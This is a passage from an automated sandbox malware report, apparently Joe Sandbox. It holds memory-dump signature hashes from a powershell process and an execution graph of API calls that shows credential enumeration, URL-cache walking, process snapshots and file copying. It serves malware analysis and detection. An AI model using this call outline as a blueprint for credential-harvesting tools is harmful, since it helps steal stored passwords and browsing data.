                                                                                              • Instruction Fuzzy Hash: F451F6F1B40306DFEB258B68844466EBFA2EB85710F14C8E9D4559F2D5CB32D845CBD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                              • API String ID: 0-2392861976
                                                                                              • Opcode ID: 9d2eb50e1fea6adf88f8709e8effb90a0f1d6ba33047db8c136575ae57454dda
                                                                                              • Instruction ID: aa94706c58eb02b2c1ead97fdaa8162aea4d0c47895680346824564b2aa6f92e
                                                                                              • Opcode Fuzzy Hash: 9d2eb50e1fea6adf88f8709e8effb90a0f1d6ba33047db8c136575ae57454dda
                                                                                              • Instruction Fuzzy Hash: 2931F2FAB043068FFB2A4A659844166BBB1EB82610B24CCFFC002CF285DE32C4498791
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                              • API String ID: 0-3272787073
                                                                                              • Opcode ID: ffdb160b1efba6594d9e1428eb45e9519618c71b5efad4488e1bae764ae3ae68
                                                                                              • Instruction ID: 44f0eeb033092104f6ae86cf316e01b9f7106e0e6d7956120f2cc0cf3e800dc7
                                                                                              • Opcode Fuzzy Hash: ffdb160b1efba6594d9e1428eb45e9519618c71b5efad4488e1bae764ae3ae68
                                                                                              • Instruction Fuzzy Hash: 9341D7F5B00206DFEB294E69856D1EABBA5FB81210F2884EBD815CF2D1DE31C84DC795
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                              • API String ID: 0-3272787073
                                                                                              • Opcode ID: 4a6e33f0084f33711c7a007cbc21b0e1ff2e4a5951dfe5ec1d3f85619cf927e7
                                                                                              • Instruction ID: 3638ac8e4a4befb4cee1b27c6fddab93adae78b7bbf4761045cbb22c7340d2d1
                                                                                              • Opcode Fuzzy Hash: 4a6e33f0084f33711c7a007cbc21b0e1ff2e4a5951dfe5ec1d3f85619cf927e7
                                                                                              • Instruction Fuzzy Hash: E33137F6B44306CFEB294AE99848676BFE5EFC5110B2448FAC4058A2C5EF35C445C7D1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                              • API String ID: 0-3272787073
                                                                                              • Opcode ID: daf2e2965606c3f6be4cea006b770d18a480c375bf7ffd71fbf8a8f39838645f
                                                                                              • Instruction ID: 790467b2aa466ad4d64d3895bd072bc6ec029df4069c551ebece557302e87ce7
                                                                                              • Opcode Fuzzy Hash: daf2e2965606c3f6be4cea006b770d18a480c375bf7ffd71fbf8a8f39838645f
                                                                                              • Instruction Fuzzy Hash: 903114F570030ADFFB292A2494507BE7FA2EB91261F1044AAD8018F2D5EE35C995C7D2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                              • API String ID: 0-1420252700
                                                                                              • Opcode ID: a4060df3e6eacb81eae8fdada6f511b52a950a5f3c5c1b5c5d7a8e6edd17d6e6
                                                                                              • Instruction ID: 1bab7c49ace7345e9bd9c765c0f82b0cd758aa23c2e72dd42c8a1a55b16a30a5
                                                                                              • Opcode Fuzzy Hash: a4060df3e6eacb81eae8fdada6f511b52a950a5f3c5c1b5c5d7a8e6edd17d6e6
                                                                                              • Instruction Fuzzy Hash: 58F13BB0A00219DFDB24DB58CD55B9ABBB2BB88304F1084D9D9096F395CB71ED89CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                                              • API String ID: 0-2125118731
                                                                                              • Opcode ID: c99e8001d6ee946a3f7a78054a427f1fbe503695a2708436fc5dbf023c5cff4f
                                                                                              • Instruction ID: 351954f4ed9517085336e04a247b4cdac1c2c24815c64b0aa1e6eecba11f863f
                                                                                              • Opcode Fuzzy Hash: c99e8001d6ee946a3f7a78054a427f1fbe503695a2708436fc5dbf023c5cff4f
                                                                                              • Instruction Fuzzy Hash: 142166F130430A9BFB34557A9840B67BFDA9BC5B10F25886AE50ACB3C6DD75E844C3A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                                              • API String ID: 0-2049395529
                                                                                              • Opcode ID: 8e2bbe65676d30407b793def9445a215d5c2e708990d2f0401b040653815a53d
                                                                                              • Instruction ID: bb3929ac0cbe8db57de3047f487a2b075568bd4b4e1910d111c51d9735be58c7
                                                                                              • Opcode Fuzzy Hash: 8e2bbe65676d30407b793def9445a215d5c2e708990d2f0401b040653815a53d
                                                                                              • Instruction Fuzzy Hash: 86F059B1B4520F8BE73D651C251076A8AF7EFC4E1072485AEC8019F3C9CE21CC4A43D6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 6.1%
Dynamic/Decrypted Code Coverage: 9.2%
Signature Coverage: 1.5%
Total number of Nodes: 2000
Total number of Limit Nodes: 75
calls 38318->38325 38323 445c37 38320->38323 38783 445093 23 API calls 38321->38783 38322 4456eb 38328 4456fd memset memset memset memset 38322->38328 38329 4457ea 38322->38329 38330 445389 258 API calls 38323->38330 38324 445b17 38756 40aebe 38324->38756 38332 445e33 38325->38332 38676 409c70 wcscpy wcsrchr 38328->38676 38679 413d29 38329->38679 38336 445c47 38330->38336 38337 409d1f 6 API calls 38332->38337 38334 445e7e 38339 445f67 38334->38339 38342 40b2cc 27 API calls 38336->38342 38343 445e47 38337->38343 38338->38204 38576 403e2d memset memset memset memset memset 38338->38576 38344 40b2cc 27 API calls 38339->38344 38340 445ab2 memset 38345 40b2cc 27 API calls 38340->38345 38347 445c53 38342->38347 38782 409b98 GetFileAttributesW 38343->38782 38349 445f73 38344->38349 38350 445aa1 38345->38350 38346 409c70 2 API calls 38351 44577e 38346->38351 38352 409d1f 6 API calls 38347->38352 38354 409d1f 6 API calls 38349->38354 38350->38324 38350->38340 38355 409d1f 6 API calls 38350->38355 38649 40add4 38350->38649 38654 445389 38350->38654 38663 40ae51 38350->38663 38356 409c70 2 API calls 38351->38356 38357 445c67 38352->38357 38353 445e56 38353->38321 38361 445e83 memset 38353->38361 38358 445f87 38354->38358 38355->38350 38359 44578d 38356->38359 38360 445389 258 API calls 38357->38360 38786 409b98 GetFileAttributesW 38358->38786 38359->38329 38366 40b2cc 27 API calls 38359->38366 38360->38221 38365 40b2cc 27 API calls 38361->38365 38364->38247 38364->38309 38367 445eab 38365->38367 38368 4457a8 38366->38368 38369 409d1f 6 API calls 38367->38369 38370 409d1f 6 API calls 38368->38370 38372 445ebf 38369->38372 38371 4457b8 38370->38371 38678 409b98 GetFileAttributesW 38371->38678 38374 40ae18 9 API calls 38372->38374 38378 445ef5 38374->38378 38375 4457c7 38375->38329 38377 4087b3 338 API calls 38375->38377 38376 40ae51 9 API calls 38376->38378 38377->38329 38378->38376 38379 445f5c 38378->38379 38381 40add4 2 API calls 38378->38381 38382 40b2cc 27 API calls 
38378->38382 38383 409d1f 6 API calls 38378->38383 38385 445f3a 38378->38385 38784 409b98 GetFileAttributesW 38378->38784 38380 40aebe FindClose 38379->38380 38380->38339 38381->38378 38382->38378 38383->38378 38785 445093 23 API calls 38385->38785 38387->38186 38388->38188 38389->38186 38390->38181 38392 40c775 38391->38392 38787 40b1ab ??3@YAXPAX ??3@YAXPAX 38392->38787 38394 40c788 38788 40b1ab ??3@YAXPAX ??3@YAXPAX 38394->38788 38396 40c790 38789 40b1ab ??3@YAXPAX ??3@YAXPAX 38396->38789 38398 40c798 38399 40aa04 ??3@YAXPAX 38398->38399 38400 40c7a0 38399->38400 38790 40c274 memset 38400->38790 38405 40a8ab 9 API calls 38406 40c7c3 38405->38406 38407 40a8ab 9 API calls 38406->38407 38408 40c7d0 38407->38408 38819 40c3c3 38408->38819 38412 40c877 38421 40bdb0 38412->38421 38413 40c86c 38861 4053fe 39 API calls 38413->38861 38419 40c7e5 38419->38412 38419->38413 38420 40c634 49 API calls 38419->38420 38844 40a706 38419->38844 38420->38419 39029 404363 38421->39029 38424 40bf5d 39049 40440c 38424->39049 38426 40bdee 38426->38424 38429 40b2cc 27 API calls 38426->38429 38427 40bddf CredEnumerateW 38427->38426 38430 40be02 wcslen 38429->38430 38430->38424 38437 40be1e 38430->38437 38431 40be26 _wcsncoll 38431->38437 38434 40be7d memset 38435 40bea7 memcpy 38434->38435 38434->38437 38436 40bf11 wcschr 38435->38436 38435->38437 38436->38437 38437->38424 38437->38431 38437->38434 38437->38435 38437->38436 38438 40b2cc 27 API calls 38437->38438 38440 40bf43 LocalFree 38437->38440 39052 40bd5d 28 API calls 38437->39052 39053 404423 38437->39053 38439 40bef6 _wcsnicmp 38438->38439 38439->38436 38439->38437 38440->38437 38441 4135f7 39066 4135e0 38441->39066 38444 40b2cc 27 API calls 38445 41360d 38444->38445 38446 40a804 8 API calls 38445->38446 38447 413613 38446->38447 38448 41361b 38447->38448 38449 41363e 38447->38449 38450 40b273 27 API calls 38448->38450 38451 4135e0 FreeLibrary 38449->38451 38452 413625 GetProcAddress 38450->38452 38453 413643 38451->38453 
38452->38449 38454 413648 38452->38454 38453->38231 38455 413658 38454->38455 38456 4135e0 FreeLibrary 38454->38456 38455->38231 38457 413666 38456->38457 38457->38231 39069 4449b9 38458->39069 38461 4449b9 42 API calls 38463 444b4b 38461->38463 38462 444c15 38465 4449b9 42 API calls 38462->38465 38463->38462 39090 444972 GetVersionExW 38463->39090 38466 444c1f 38465->38466 38466->38196 38467 444b99 memcmp 38472 444b8c 38467->38472 38468 444c0b 39094 444a85 42 API calls 38468->39094 38472->38467 38472->38468 39091 444aa5 42 API calls 38472->39091 39092 40a7a0 GetVersionExW 38472->39092 39093 444a85 42 API calls 38472->39093 38475 40399d 38474->38475 39095 403a16 38475->39095 38478 403a12 wcsrchr 38478->38212 38481 4039a3 38482 4039f4 38481->38482 38484 403a09 38481->38484 39106 40a02c CreateFileW 38481->39106 38483 4099c6 2 API calls 38482->38483 38482->38484 38483->38484 39109 40b1ab ??3@YAXPAX ??3@YAXPAX 38484->39109 38486 414c2e 16 API calls 38485->38486 38487 404048 38486->38487 38488 414c2e 16 API calls 38487->38488 38489 404056 38488->38489 38490 409d1f 6 API calls 38489->38490 38491 404073 38490->38491 38492 409d1f 6 API calls 38491->38492 38493 40408e 38492->38493 38494 409d1f 6 API calls 38493->38494 38495 4040a6 38494->38495 38496 403af5 20 API calls 38495->38496 38497 4040ba 38496->38497 38498 403af5 20 API calls 38497->38498 38499 4040cb 38498->38499 39136 40414f memset 38499->39136 38501 404140 39150 40b1ab ??3@YAXPAX ??3@YAXPAX 38501->39150 38502 4040ec memset 38506 4040e0 38502->38506 38504 404148 38504->38264 38505 4099c6 2 API calls 38505->38506 38506->38501 38506->38502 38506->38505 38507 40a8ab 9 API calls 38506->38507 38507->38506 39163 40a6e6 WideCharToMultiByte 38508->39163 38510 4087ed 39164 4095d9 memset 38510->39164 38513 408809 memset memset memset memset memset 38514 40b2cc 27 API calls 38513->38514 38515 4088a1 38514->38515 38516 409d1f 6 API calls 38515->38516 38517 4088b1 38516->38517 38518 40b2cc 27 API calls 38517->38518 38519 4088c0 
38518->38519 38520 409d1f 6 API calls 38519->38520 38521 4088d0 38520->38521 38522 40b2cc 27 API calls 38521->38522 38523 4088df 38522->38523 38524 409d1f 6 API calls 38523->38524 38525 4088ef 38524->38525 38526 40b2cc 27 API calls 38525->38526 38527 4088fe 38526->38527 38528 409d1f 6 API calls 38527->38528 38529 40890e 38528->38529 38530 40b2cc 27 API calls 38529->38530 38531 40891d 38530->38531 38532 409d1f 6 API calls 38531->38532 38533 40892d 38532->38533 39183 409b98 GetFileAttributesW 38533->39183 38535 40893e 38536 408943 38535->38536 38537 408958 38535->38537 39184 407fdf 75 API calls 38536->39184 39185 409b98 GetFileAttributesW 38537->39185 38540 408964 38541 408969 38540->38541 38542 40897b 38540->38542 39186 4082c7 199 API calls 38541->39186 39187 409b98 GetFileAttributesW 38542->39187 38545 408987 38547 4089a1 38545->38547 38548 40898c 38545->38548 38546 408953 38546->38264 38560 40b633 ??3@YAXPAX 38559->38560 38561 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38560->38561 38562 413f00 Process32NextW 38561->38562 38563 413da5 OpenProcess 38562->38563 38564 413f17 FindCloseChangeNotification 38562->38564 38565 413eb0 38563->38565 38566 413df3 memset 38563->38566 38564->38304 38565->38562 38568 413ebf ??3@YAXPAX 38565->38568 38569 4099f4 3 API calls 38565->38569 39475 413f27 38566->39475 38568->38565 38569->38565 38571 413e37 GetModuleHandleW 38572 413e46 GetProcAddress 38571->38572 38573 413e1f 38571->38573 38572->38573 38573->38571 39480 413959 38573->39480 39496 413ca4 38573->39496 38575 413ea2 CloseHandle 38575->38565 38577 414c2e 16 API calls 38576->38577 38578 403eb7 38577->38578 38579 414c2e 16 API calls 38578->38579 38580 403ec5 38579->38580 38581 409d1f 6 API calls 38580->38581 38582 403ee2 38581->38582 38583 409d1f 6 API calls 38582->38583 38584 403efd 38583->38584 38585 409d1f 6 API calls 38584->38585 38586 403f15 38585->38586 38587 403af5 20 API calls 38586->38587 38588 403f29 38587->38588 38589 403af5 20 API calls 38588->38589 38590 
403f3a 38589->38590 38591 40414f 33 API calls 38590->38591 38597 403f4f 38591->38597 38592 403faf 39510 40b1ab ??3@YAXPAX ??3@YAXPAX 38592->39510 38594 403f5b memset 38594->38597 38595 403fb7 38595->38250 38596 4099c6 2 API calls 38596->38597 38597->38592 38597->38594 38597->38596 38598 40a8ab 9 API calls 38597->38598 38598->38597 38600 414c2e 16 API calls 38599->38600 38601 403d26 38600->38601 38602 414c2e 16 API calls 38601->38602 38603 403d34 38602->38603 38604 409d1f 6 API calls 38603->38604 38605 403d51 38604->38605 38606 409d1f 6 API calls 38605->38606 38607 403d6c 38606->38607 38608 409d1f 6 API calls 38607->38608 38609 403d84 38608->38609 38610 403af5 20 API calls 38609->38610 38611 403d98 38610->38611 38612 403af5 20 API calls 38611->38612 38613 403da9 38612->38613 38614 40414f 33 API calls 38613->38614 38620 403dbe 38614->38620 38615 403e1e 39511 40b1ab ??3@YAXPAX ??3@YAXPAX 38615->39511 38616 403dca memset 38616->38620 38618 403e26 38618->38253 38619 4099c6 2 API calls 38619->38620 38620->38615 38620->38616 38620->38619 38621 40a8ab 9 API calls 38620->38621 38621->38620 38623 414b81 9 API calls 38622->38623 38624 414c40 38623->38624 38625 414c73 memset 38624->38625 39512 409cea 38624->39512 38629 414c94 38625->38629 38628 414c64 38628->38245 39515 414592 RegOpenKeyExW 38629->39515 38631 414cc1 38632 414cf4 wcscpy 38631->38632 39516 414bb0 wcscpy 38631->39516 38632->38628 38634 414cd2 39517 4145ac RegQueryValueExW 38634->39517 38636 414ce9 RegCloseKey 38636->38632 38638 409d43 wcscpy 38637->38638 38640 409d62 38637->38640 38639 409719 2 API calls 38638->38639 38641 409d51 wcscat 38639->38641 38640->38284 38641->38640 38643 40aebe FindClose 38642->38643 38644 40ae21 38643->38644 38645 4099c6 2 API calls 38644->38645 38646 40ae35 38645->38646 38647 409d1f 6 API calls 38646->38647 38648 40ae49 38647->38648 38648->38350 38650 40ade0 38649->38650 38651 40ae0f 38649->38651 38650->38651 38652 40ade7 wcscmp 38650->38652 38651->38350 38652->38651 38653 40adfe 
wcscmp 38652->38653 38653->38651 38655 40ae18 9 API calls 38654->38655 38661 4453c4 38655->38661 38656 40ae51 9 API calls 38656->38661 38657 4453f3 38658 40aebe FindClose 38657->38658 38660 4453fe 38658->38660 38659 40add4 2 API calls 38659->38661 38660->38350 38661->38656 38661->38657 38661->38659 38662 445403 253 API calls 38661->38662 38662->38661 38664 40ae7b FindNextFileW 38663->38664 38665 40ae5c FindFirstFileW 38663->38665 38666 40ae94 38664->38666 38667 40ae8f 38664->38667 38665->38666 38669 40aeb6 38666->38669 38670 409d1f 6 API calls 38666->38670 38668 40aebe FindClose 38667->38668 38668->38666 38669->38350 38670->38669 38671->38219 38672->38307 38673->38291 38674->38291 38675->38322 38677 409c89 38676->38677 38677->38346 38678->38375 38680 413d39 38679->38680 38681 413d2f FreeLibrary 38679->38681 38682 40b633 ??3@YAXPAX 38680->38682 38681->38680 38683 413d42 38682->38683 38684 40b633 ??3@YAXPAX 38683->38684 38685 413d4a 38684->38685 38685->38338 38686->38204 38687->38205 38688->38276 38690 44db70 38689->38690 38691 40b6fc memset 38690->38691 38692 409c70 2 API calls 38691->38692 38693 40b732 wcsrchr 38692->38693 38694 40b743 38693->38694 38695 40b746 memset 38693->38695 38694->38695 38696 40b2cc 27 API calls 38695->38696 38697 40b76f 38696->38697 38698 409d1f 6 API calls 38697->38698 38699 40b783 38698->38699 39518 409b98 GetFileAttributesW 38699->39518 38701 40b792 38702 409c70 2 API calls 38701->38702 38716 40b7c2 38701->38716 38704 40b7a5 38702->38704 38706 40b2cc 27 API calls 38704->38706 38711 40b7b2 38706->38711 38707 40b837 FindCloseChangeNotification 38710 40b83e memset 38707->38710 38708 40b817 39553 409a45 GetTempPathW 38708->39553 39552 40a6e6 WideCharToMultiByte 38710->39552 38714 409d1f 6 API calls 38711->38714 38712 40b827 CopyFileW 38712->38710 38714->38716 38715 40b866 38717 444432 121 API calls 38715->38717 39519 40bb98 38716->39519 38718 40b879 38717->38718 38719 40bad5 38718->38719 38720 40b273 27 API calls 38718->38720 38721 40baeb 
38719->38721 38722 40bade DeleteFileW 38719->38722 38723 40b89a 38720->38723 38724 40b04b ??3@YAXPAX 38721->38724 38722->38721 38725 438552 134 API calls 38723->38725 38726 40baf3 38724->38726 38727 40b8a4 38725->38727 38726->38207 38728 40bacd 38727->38728 38730 4251c4 137 API calls 38727->38730 38729 443d90 111 API calls 38728->38729 38729->38719 38753 40b8b8 38730->38753 38731 40bac6 39565 424f26 123 API calls 38731->39565 38732 40b8bd memset 39556 425413 17 API calls 38732->39556 38735 425413 17 API calls 38735->38753 38738 40a71b MultiByteToWideChar 38738->38753 38739 40a734 MultiByteToWideChar 38739->38753 38742 40b9b5 memcmp 38742->38753 38743 4099c6 2 API calls 38743->38753 38744 404423 37 API calls 38744->38753 38747 4251c4 137 API calls 38747->38753 38748 40bb3e memset memcpy 39566 40a734 MultiByteToWideChar 38748->39566 38750 40bb88 LocalFree 38750->38753 38753->38731 38753->38732 38753->38735 38753->38738 38753->38739 38753->38742 38753->38743 38753->38744 38753->38747 38753->38748 38754 40ba5f memcmp 38753->38754 39557 4253ef 16 API calls 38753->39557 39558 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38753->39558 39559 4253af 17 API calls 38753->39559 39560 4253cf 17 API calls 38753->39560 39561 447280 memset 38753->39561 39562 447960 memset memcpy memcpy memcpy 38753->39562 39563 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38753->39563 39564 447920 memcpy memcpy memcpy 38753->39564 38754->38753 38755->38280 38757 40aed1 38756->38757 38758 40aec7 FindClose 38756->38758 38757->38216 38758->38757 38760 4099d7 38759->38760 38761 4099da memcpy 38759->38761 38760->38761 38761->38263 38763 40b2cc 27 API calls 38762->38763 38764 44543f 38763->38764 38765 409d1f 6 API calls 38764->38765 38766 44544f 38765->38766 39653 409b98 GetFileAttributesW 38766->39653 38768 445476 38771 40b2cc 27 API calls 38768->38771 38769 44545e 38769->38768 38770 40b6ef 252 API calls 38769->38770 38770->38768 38772 445482 38771->38772 38773 409d1f 6 API calls 38772->38773 38774 445492 
38773->38774 39654 409b98 GetFileAttributesW 38774->39654 38776 4454a1 38777 4454b9 38776->38777 38778 40b6ef 252 API calls 38776->38778 38777->38289 38778->38777 38779->38288 38780->38312 38781->38318 38782->38353 38783->38334 38784->38378 38785->38378 38786->38364 38787->38394 38788->38396 38789->38398 38791 414c2e 16 API calls 38790->38791 38792 40c2ae 38791->38792 38862 40c1d3 38792->38862 38797 40c3be 38814 40a8ab 38797->38814 38798 40afcf 2 API calls 38799 40c2fd FindFirstUrlCacheEntryW 38798->38799 38800 40c3b6 38799->38800 38801 40c31e wcschr 38799->38801 38802 40b04b ??3@YAXPAX 38800->38802 38803 40c331 38801->38803 38804 40c35e FindNextUrlCacheEntryW 38801->38804 38802->38797 38805 40a8ab 9 API calls 38803->38805 38804->38801 38806 40c373 GetLastError 38804->38806 38809 40c33e wcschr 38805->38809 38807 40c3ad FindCloseUrlCache 38806->38807 38808 40c37e 38806->38808 38807->38800 38810 40afcf 2 API calls 38808->38810 38809->38804 38811 40c34f 38809->38811 38812 40c391 FindNextUrlCacheEntryW 38810->38812 38813 40a8ab 9 API calls 38811->38813 38812->38801 38812->38807 38813->38804 38956 40a97a 38814->38956 38817 40a8cc 38817->38405 38818 40a8d0 7 API calls 38818->38817 38961 40b1ab ??3@YAXPAX ??3@YAXPAX 38819->38961 38821 40c3dd 38822 40b2cc 27 API calls 38821->38822 38823 40c3e7 38822->38823 38962 414592 RegOpenKeyExW 38823->38962 38825 40c3f4 38826 40c50e 38825->38826 38827 40c3ff 38825->38827 38841 405337 38826->38841 38828 40a9ce 4 API calls 38827->38828 38829 40c418 memset 38828->38829 38963 40aa1d 38829->38963 38832 40c471 38834 40c47a _wcsupr 38832->38834 38833 40c505 RegCloseKey 38833->38826 38835 40a8d0 7 API calls 38834->38835 38836 40c498 38835->38836 38837 40a8d0 7 API calls 38836->38837 38838 40c4ac memset 38837->38838 38839 40aa1d 38838->38839 38840 40c4e4 RegEnumValueW 38839->38840 38840->38833 38840->38834 38965 405220 38841->38965 38845 4099c6 2 API calls 38844->38845 38846 40a714 _wcslwr 38845->38846 38847 40c634 38846->38847 39022 405361 
38847->39022 38850 40c65c wcslen 39025 4053b6 39 API calls 38850->39025 38851 40c71d wcslen 38851->38419 38853 40c677 38854 40c713 38853->38854 39026 40538b 39 API calls 38853->39026 39028 4053df 39 API calls 38854->39028 38857 40c6a5 38857->38854 38858 40c6a9 memset 38857->38858 38859 40c6d3 38858->38859 39027 40c589 43 API calls 38859->39027 38861->38412 38863 40ae18 9 API calls 38862->38863 38869 40c210 38863->38869 38864 40ae51 9 API calls 38864->38869 38865 40c264 38866 40aebe FindClose 38865->38866 38868 40c26f 38866->38868 38867 40add4 2 API calls 38867->38869 38874 40e5ed memset memset 38868->38874 38869->38864 38869->38865 38869->38867 38870 40c231 _wcsicmp 38869->38870 38871 40c1d3 35 API calls 38869->38871 38870->38869 38872 40c248 38870->38872 38871->38869 38887 40c084 22 API calls 38872->38887 38875 414c2e 16 API calls 38874->38875 38876 40e63f 38875->38876 38877 409d1f 6 API calls 38876->38877 38878 40e658 38877->38878 38888 409b98 GetFileAttributesW 38878->38888 38880 40e667 38881 40e680 38880->38881 38882 409d1f 6 API calls 38880->38882 38889 409b98 GetFileAttributesW 38881->38889 38882->38881 38884 40e68f 38886 40c2d8 38884->38886 38890 40e4b2 38884->38890 38886->38797 38886->38798 38887->38869 38888->38880 38889->38884 38911 40e01e 38890->38911 38892 40e593 38893 40e5b0 38892->38893 38894 40e59c DeleteFileW 38892->38894 38896 40b04b ??3@YAXPAX 38893->38896 38894->38893 38895 40e521 38895->38892 38934 40e175 38895->38934 38897 40e5bb 38896->38897 38899 40e5c4 CloseHandle 38897->38899 38900 40e5cc 38897->38900 38899->38900 38902 40b633 ??3@YAXPAX 38900->38902 38901 40e573 38904 40e584 38901->38904 38905 40e57c FindCloseChangeNotification 38901->38905 38903 40e5db 38902->38903 38907 40b633 ??3@YAXPAX 38903->38907 38955 40b1ab ??3@YAXPAX ??3@YAXPAX 38904->38955 38905->38904 38906 40e540 38906->38901 38954 40e2ab 30 API calls 38906->38954 38909 40e5e3 38907->38909 38909->38886 38912 406214 22 API calls 38911->38912 38913 40e03c 38912->38913 38914 
40e16b 38913->38914 38915 40dd85 74 API calls 38913->38915 38914->38895 38916 40e06b 38915->38916 38916->38914 38917 40afcf ??2@YAPAXI ??3@YAXPAX 38916->38917 38918 40e08d OpenProcess 38917->38918 38919 40e0a4 GetCurrentProcess DuplicateHandle 38918->38919 38923 40e152 38918->38923 38920 40e0d0 GetFileSize 38919->38920 38921 40e14a CloseHandle 38919->38921 38924 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38920->38924 38921->38923 38922 40e160 38926 40b04b ??3@YAXPAX 38922->38926 38923->38922 38925 406214 22 API calls 38923->38925 38927 40e0ea 38924->38927 38925->38922 38926->38914 38928 4096dc CreateFileW 38927->38928 38929 40e0f1 CreateFileMappingW 38928->38929 38930 40e140 CloseHandle CloseHandle 38929->38930 38931 40e10b MapViewOfFile 38929->38931 38930->38921 38932 40e13b FindCloseChangeNotification 38931->38932 38933 40e11f WriteFile UnmapViewOfFile 38931->38933 38932->38930 38933->38932 38935 40e18c 38934->38935 38936 406b90 11 API calls 38935->38936 38937 40e19f 38936->38937 38938 40e1a7 memset 38937->38938 38939 40e299 38937->38939 38944 40e1e8 38938->38944 38940 4069a3 ??3@YAXPAX ??3@YAXPAX 38939->38940 38941 40e2a4 38940->38941 38941->38906 38942 406e8f 13 API calls 38942->38944 38943 406b53 SetFilePointerEx ReadFile 38943->38944 38944->38942 38944->38943 38945 40e283 38944->38945 38946 40dd50 _wcsicmp 38944->38946 38950 40742e 8 API calls 38944->38950 38951 40aae3 wcslen wcslen _memicmp 38944->38951 38952 40e244 _snwprintf 38944->38952 38947 40e291 38945->38947 38948 40e288 ??3@YAXPAX 38945->38948 38946->38944 38949 40aa04 ??3@YAXPAX 38947->38949 38948->38947 38949->38939 38950->38944 38951->38944 38953 40a8d0 7 API calls 38952->38953 38953->38944 38954->38906 38955->38892 38958 40a980 38956->38958 38957 40a8bb 38957->38817 38957->38818 38958->38957 38959 40a995 _wcsicmp 38958->38959 38960 40a99c wcscmp 38958->38960 38959->38958 38960->38958 38961->38821 38962->38825 38964 40aa23 RegEnumValueW 38963->38964 38964->38832 38964->38833 38966 
405335 38965->38966 38967 40522a 38965->38967 38966->38419 38968 40b2cc 27 API calls 38967->38968 38969 405234 38968->38969 38970 40a804 8 API calls 38969->38970 38971 40523a 38970->38971 39010 40b273 38971->39010 38973 405248 _mbscpy _mbscat GetProcAddress 38974 40b273 27 API calls 38973->38974 38975 405279 38974->38975 39013 405211 GetProcAddress 38975->39013 38977 405282 38978 40b273 27 API calls 38977->38978 38979 40528f 38978->38979 39014 405211 GetProcAddress 38979->39014 38981 405298 38982 40b273 27 API calls 38981->38982 38983 4052a5 38982->38983 39015 405211 GetProcAddress 38983->39015 38985 4052ae 38986 40b273 27 API calls 38985->38986 38987 4052bb 38986->38987 39016 405211 GetProcAddress 38987->39016 38989 4052c4 38990 40b273 27 API calls 38989->38990 38991 4052d1 38990->38991 39017 405211 GetProcAddress 38991->39017 38993 4052da 38994 40b273 27 API calls 38993->38994 38995 4052e7 38994->38995 39018 405211 GetProcAddress 38995->39018 38997 4052f0 38998 40b273 27 API calls 38997->38998 38999 4052fd 38998->38999 39019 405211 GetProcAddress 38999->39019 39001 405306 39002 40b273 27 API calls 39001->39002 39003 405313 39002->39003 39020 405211 GetProcAddress 39003->39020 39005 40531c 39006 40b273 27 API calls 39005->39006 39007 405329 39006->39007 39021 405211 GetProcAddress 